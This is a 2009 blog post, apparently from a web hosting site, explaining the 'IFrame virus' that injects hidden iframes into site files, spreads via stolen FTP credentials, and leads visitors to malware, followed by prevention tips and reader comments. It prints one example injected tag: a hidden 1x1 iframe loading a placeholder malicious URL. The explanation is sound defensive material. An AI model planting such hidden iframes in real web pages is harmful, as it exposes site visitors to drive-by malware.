Beware of the IFrame Virus of 2009



As we know, a virus is a malicious piece of code, embedded into the programmer’s code. This “bad” code could be in any programming language including HTML. As Internet has become an integral part of the milieu, with the increasing number of users, alarming number of hackers have turned up. The viruses coded by these hackers are designed to attack the various websites and inject malware into the system, with the single intention of corrupting the Internet usage.

What is the Iframe virus and what does it do?

The IFrame virus is the HTML code <IFrame> embedded into the source code of your webpage. It could be injected into any of the source files, be they html or php or active server pages. It may infect through, mainly, open source CMS (content management system) software like Joomla. The virus modifies the client’s host and access files, and creates dummy .php files in the images directory in the site directory. However, it can only infect those sites in the Web server to which it has access via passwords.

Usually, when the IFRAME code is inserted in the site’s index.* files in all directories, the code added might look like this:

<iframe src= “MALICIOUS_URL” width=1 height=1 style=”visibility:hidden;position:absolute”>

However, recently, it has come to be known, that the “bad” code could be a java script rather than the <IFRAME> tag html code.

What this code does is leave you with tons of iframes, or floating frames as we know them, on your web pages. Each of these Iframes lead to a malicious Web site which if successful leads to installation of malware on your computer.

Before the user realizes, his/her website is flagged as “Sites that may harm your computer” on Google


How it spreads?

Once the user’s PC is infected with the Iframe virus, it can infect other clients easily via FTP. Once it gets hold of another set of FTP username/password combination of another FTP client, it downloads the client’s index files, appends the spurious code into the files and anytime these files are accessed and uploaded, the Iframe virus gets active again. And so the cycle continues.

IFrame Cures?

The Internet is full of news on the Iframe virus and the various cures for it.

There are open source “cure” software’s available, which claim to be able to remove this virus. Also there are many technical bloggers who will give you step by step solution for removing the virus. Alternatively, you may also seek help from your hosting service provider for assistance.

Usually, any robust Anti-virus built into the user’s system triggers off a “Malicious website” alarm and asks access to be denied to it when the Website reports this virus.

Therefore, it is essential for any Internet user to use verified and updated virus definition files of “non-pirated” Anti-virus software. Also, to ensure that this virus does not attack your code, as a programmer, steps should be taken to ensure that the code is free of any “SQL injection” or hard coded username/password combination. Proper encryption/decryption keys should be used to ensure the safety of the authentication. Cookies to store the username and password keys should ideally not be enabled.

Simple steps like these will ensure safe Internet access and prevent spread of any kind of virus through the Web.

This article was written and contributed by Joanna who has been part of web hosting search from last 2 years and following up with the web industry over 3 years now.


  1. Elijah 8 December, 2009 at 01:13

    Is joomla the common target here? I am a cms user and I use Typo3 for my sites, I’ve worked on Joomla before and never liked it… one of the reasons is that it’s very prone to security issues =/

  2. prepaid handy 27 June, 2010 at 18:02

    I created a new typo3 site and I don’t have a good design yet. But I hope your tutorial will help me a bit, but it looks complicated for a beginner like me.

  3. website 7 August, 2011 at 15:34

    I have to express some thanks to this writer for rescuing me from this type of situation. Because of exploring through the the net and obtaining basics which were not productive, I believed my entire life was well over. Being alive without the answers to the difficulties you have resolved by means of your guide is a critical case, as well as those that might have in a wrong way damaged my career if I had not noticed the website. That competence and kindness in handling the whole lot was invaluable. I am not sure what I would have done if I hadn’t come across such a point like this. I am able to now relish my future. Thanks a lot very much for the reliable and amazing help. I won’t hesitate to propose your web sites to anybody who would like assistance about this situation.

  4. Richbrodkin 4 July, 2017 at 08:24

    Thanks for the post, Security is arguably the most important reason why you should keep your website up to date. It is important to get the latest version.

Post a new comment

Recommended for you